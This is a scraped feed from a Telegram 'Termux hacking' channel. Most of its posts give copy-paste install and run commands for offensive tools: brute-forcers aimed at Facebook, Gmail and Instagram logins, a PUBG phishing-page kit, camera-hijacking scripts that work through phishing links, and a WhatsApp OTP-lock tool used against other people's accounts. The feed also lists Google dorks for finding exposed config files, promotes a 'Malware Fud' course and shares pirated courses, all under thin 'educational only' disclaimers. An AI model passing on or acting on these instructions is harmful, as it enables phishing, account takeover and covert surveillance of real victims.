Termux Commands
8.83K subscribers
45 photos
2 videos
5 files
14 links
This Channel DOES NOT Promote or encourage Any illegal activities, all content provided by This Channel is meant for EDUCATIONAL PURPOSE only.
Download Telegram
๐ŸŽญ Google Dorks for Bug Bounty ๐Ÿ’ 

A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting


### Broad domain search w/ negative search

> site:example.com -www-shop-share -ir -mfa


### PHP extension w/ parameters

> site:example.com ext: php inurl:?


Disclosed XSS and Open Redirects

> site:openbugbounty.org inurl: reports intext: "example.com"


### Juicy Extensions

> site: "example[.]com" ext:log | ext:txt | ext:conf | ext: cnf | ext:ini |

ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git |

ext:svn | ext:htpasswd | ext: htaccess


### XSS prone parameters

> inurl:q= | inurl:s= | inurl: search= | inurl:query= | inurl: keyword= |

inurl:lang= inurl:& site:example.com


### Open Redirect prone parameters

> inurl:url= | inurl: return= | inurl: next= | inurl: redirect= | inurl:redir= |

inurl:ret= | inurl: r2= | inurl:page= inurl:& inurl:http site:example.com


โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ๏ธ Channel - @Termux_Hacking_TLS
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
๐Ÿ‘55โค14๐Ÿ”ฅ4
๐Ÿ’ผ Antivirus course ๐Ÿ›ก๏ธ

What You will Learn

Reverse Engineering
Malware Fud
How Antivirus Work
How Android Code Work
How Google Security Work

https://mega.nz/folder/gldnWITB#_J3wIOwUYVriPX6sRfDpbA


Contact for posting these content in your channel

โœ…Share with Your Friends.

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ๏ธ Channel - @Termux_Hacking_TLS
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘25โค9๐Ÿ”ฅ4๐Ÿฅฐ2
Udemy_The_Complete_Python_Hacking_Course_Beginner_to_Advanced_7z.003
1.6 GB
๐Ÿ”ธSHARE OUR CHANNEL IN YOUR GROUP OR CHANNEL HELP US TO GROW๐Ÿ”ป

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ๏ธ Channel -
@Termux_Hacking_TLS
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘34โค17๐Ÿ”ฅ9๐ŸŽ‰3
๐Ÿ“ฆSocial-Box: a bruteforce attack framework.

Introduction
โ€ฆ

Brute forcing is a technique or method used in computer science and cryptography to break passwords or encryption by systematically trying out all possible combinations until the correct one is found. It involves automated and repetitive attempts, using a combination of different characters, numbers, and symbols, to guess the password.

Brute forcing is a time-consuming process as it requires trying out an extensive number of possibilities.
๐Ÿ‘37โค6๐Ÿฅฐ2๐Ÿ”ฅ1
Termux Commands
๐Ÿ“ฆSocial-Box: a bruteforce attack framework. Introductionโ€ฆ Brute forcing is a technique or method used in computer science and cryptography to break passwords or encryption by systematically trying out all possible combinations until the correct one is found.โ€ฆ
Installation On Termux :

To use SocialBox type the following commands in Termux :

โ€ข apt-get update

โ€ข apt-get install git

โ€ข git clone https://github.com/samsesh/SocialBox-Termux.git

โ€ข cd SocialBox-Termux

โ€ข chmod +x install-sb.sh

โ€ข ./install-sb.sh

Command For Running SocialBox.

โ€ข ./SocialBox.sh

support us & spread the link๐Ÿค
โœ… @Termux_Hacking_TLS
๐Ÿ‘53โค12๐Ÿ”ฅ8๐Ÿฅฐ4๐ŸŽ‰4
๐Ÿ“– A Briefly Definition Of Pishing

Phishing tools are typically used to trick people into giving away their personal information (credentials) by creating fake login pages or websites that look like legitimate ones.

Black Mafia: A PUBG Phishing tool that will allow you to Create pishing pages that looks like A PUBG Offer Page
๐Ÿ‘25โค7๐Ÿ”ฅ2๐Ÿฅฐ2
Termux Commands
๐Ÿ“– A Briefly Definition Of Pishing Phishing tools are typically used to trick people into giving away their personal information (credentials) by creating fake login pages or websites that look like legitimate ones. Black Mafia: A PUBG Phishing tool thatโ€ฆ
Installation: To Use "Black Mafia" Type The Following Commands Each On Your (Termux!) Terminal

โ€ข apt update && apt upgrade -y

โ€ข apt install php wget git -y

โ€ข git clone https://github.com/lovehacker404/Phishing

โ€ข cd Phishing

โ€ข chmod +x BlackMafia.sh ngrok

โ€ข bash BlackMafia.sh

support us & spread the link๐Ÿค
   
    โœ… @Termux_Hacking_TLS
โค39๐Ÿ‘33๐Ÿ”ฅ7๐ŸŽ‰5
Happy โค๏ธโค๏ธNEW YEAR TO ALL OUR PRECIOUS FOLLOWERSโค๏ธโค๏ธ
โค44๐ŸŽ‰15๐Ÿ‘9๐Ÿ”ฅ3
Hi everyone! Weโ€™re curious to know where our amazing users are from. This helps us better understand our community.

Please select the region that best represents your location from the poll options below. Your response is greatly appreciated.
Anonymous Poll
14%
North America
7%
Latin America and the Caribbean
25%
Asia-Pacific
11%
Europe
9%
Middle East and North Africa
7%
Sub-Saharan Africa
27%
Others (please specify in the comments if you like)
โค21๐Ÿ‘15๐Ÿ”ฅ3๐ŸŽ‰1
This media is not supported in your browser
VIEW IN TELEGRAM
โค52๐Ÿ‘11๐Ÿฅฐ7๐Ÿ”ฅ5๐ŸŽ‰5
โœ… How to Hack the Front Camera of phones via a Buttermix link
๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ

Credits: ๐Ÿ˜ถTheLevel8๐Ÿ˜ถ

๐Ÿ”—Tutorial Link:
https://drive.google.com/drive/folders/1CECQjPEp6_mOJ0CuxHz2S10uf07hzQc5

๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ
๐Ÿ˜ˆTermux APK: Click Here

๐Ÿ™‚PKG's Install in Video:

1๏ธโƒฃtermux-setup-storage
2๏ธโƒฃapt update
3๏ธโƒฃapt upgrade
4๏ธโƒฃapt install php
5๏ธโƒฃgit clone https://github.com/KasRoudra/CamHacker
6๏ธโƒฃcd CamHacker
7๏ธโƒฃbash ch.sh

๐Ÿ”คUsage:
bash ch.sh [-h] [-o OPTION] [-p PORT] [-t TUNNELER] [-u] [-nu]
๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ๐Ÿ”ธ
Note: DON'T SHARE WITHOUT CREDIT..OTHERWISE I'LL EAT YOU๐Ÿ˜จ

Enjoy and Give Reacts๐Ÿ˜”
๐Ÿ‘153โค31๐Ÿ”ฅ19๐Ÿฅฐ14๐ŸŽ‰4
๐Ÿ‘25๐Ÿฅฐ13๐ŸŽ‰5โค3๐Ÿ”ฅ3
WhatsApp OTP Lock

๐ŸคกABOUT TOOL :
Otp Lock is a python based script which is officially made for termux users and from this tool you can spread whatsApp otp lock by just sending number. This tool works on both rooted Android device and Non-rooted Android device. Warning ๐ŸคฉThis Tool Formates (WhatsApp Otp Lock) So think and Use.

AVAILABLE ON :
Termux
TESTED ON :
Termux
REQUIREMENTS :
internet
external storage permission
FEATURES :
[+] Dangerous otp lock tool !
[+] Updated maintainence !
[+] Easy for beginners !
[+] Working otp lock tool for termux !
INSTALLATION [Termux] :


apt-get update -y

apt-get upgrade -y

pkg install python -y

pkg install git -y

git clone
https://github.com/Mr-Krishna-90/WhatsApp-Otp-Lock
cd
$HOME

ls

cd WhatsApp-Otp-Lock

pip install requests

ls


python Whatsapp-Otp-Lock
[+]-- Now you need internet connection to continue further process...
[+]-- You can select any option by clicking on your keyboard
[+]-- Note:- Don't delete any of the scripts included in lol directory (folder)

@Termux_Hacking_TLS
๐Ÿ‘58โค26๐Ÿ”ฅ2
๐Ÿ”ฐMyServer

MyServer is your own localhost web server. you can setup PHP, Apache, Nginx and MySQL servers on your android devices or linux like Ubuntu etc. MyServer is Developed for android terminal like Termux or GNURoot Debian terminal.


โœ”๏ธINSTALLATION COMMANDS :


โ€ข pkg up -y

โ€ข pkg install git -y

โ€ข git clone https://github.com/rajkumardusad/MyServer

โ€ข cd MyServer

โ€ข chmod +x install

โ€ข bash install

โ€ข myserver start


โš ๏ธ This information only education purpose. For more information and use of this tool in termux

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ๏ธ  Telegram Channel -
@Termux_Hacking_TLS
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โค๏ธGive Reaction Here your Support is too much important for usโค๏ธ
๐Ÿ‘35โค5๐Ÿฅฐ3๐ŸŽ‰2๐Ÿ”ฅ1
๐Ÿ”ฐSocialBox-Termux

SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitter ] , Coded By Belahsan Ouerghi Edit By samsesh

โœ”๏ธInstallation :

$ pkg install -y git

$ git clone https://github.com/Cesar-Hack-Gray/SocialSploit

$ cd SocialSploit

$ ls

$ bash install.sh

$ ./Sploit

โš ๏ธ This information only education purpose. For more information and tool in termux

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ  Telegram Channel - @Termux_Hacking_TLS
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
๐Ÿ‘100โค25๐Ÿ”ฅ7๐ŸŽ‰5๐Ÿฅฐ1
๐Ÿ”ฐGrabCam

๐Ÿ“น | GrabCam โ€ข A bash script for termux. It can hack a victim's camera using a simple offer page. Works on rooted and non-rooted Android devices.


GrabCam is a script created specifically for Termux, a terminal emulator for Android. This script allows the user to hack into someone's camera by using a simple phishing page. It is compatible with both rooted and non-rooted Android devices.


โœ”๏ธFirstly Installing The Requirements.


โ€ข apt-get update -y
โ€ข apt-get upgrade -y
โ€ข pkg install python -y
โ€ข pkg install python2 -y
โ€ข pkg install git -y
โ€ข pip install lolcat

โ™ป๏ธRunning (GrabCam)


โ€ข git clone https://github.com/noob-hackers/grabcam

โ€ข cd $HOME

โ€ข ls

โ€ข cd grabcam

โ€ข ls

โ€ข bash grabcam.sh

Make sure both NGROK & Cloudflare Requirements are installed or pishing page (link) won't be generated.

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ๏ธ  Telegram Channel - @Termux_Hacking_TLS ๐Ÿ“ฑ
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
๐Ÿ‘79โค17๐Ÿ”ฅ5๐Ÿฅฐ2
Want YouTube Premium for free Tutorial ?
Complete 200 reactions.
๐Ÿ”ฅ250๐Ÿ‘56โค45๐Ÿฅฐ13๐ŸŽ‰9
๐Ÿ”ฐInstaKilo

InstaKilo By specifying someone's Instagram username their Instagram profile will be saved into your directory.
By entering someone's Instagram ID their Instagram username will show up.


๐Ÿ’ป
Works on Windows and Linux :


โ˜ข๏ธRequirements
Updating Linux


โ€ข sudo apt update -y && sudo apt upgrade -y

Installing Python version 3 Linux


โ€ข sudo apt install python3 python3-pip

Installing requirements Linux & Windows


โ€ข pip3 install requests requests[socks]

โœ”๏ธInstallation :


โ€ข curl -OJL https://raw.githubusercontent.com/An0r3w/instakilo/main/instakilo.py

โ€ข python3 instakilo.py

โš ๏ธTermux tools are for educational use only. For more information about this tool, visit the GitHub link.

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
โ™ฅ๏ธ  Telegram Channel
@Termux_Hacking_TLS๐Ÿฎ
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
๐Ÿ‘39โค12๐ŸŽ‰4๐Ÿ”ฅ1๐Ÿฅฐ1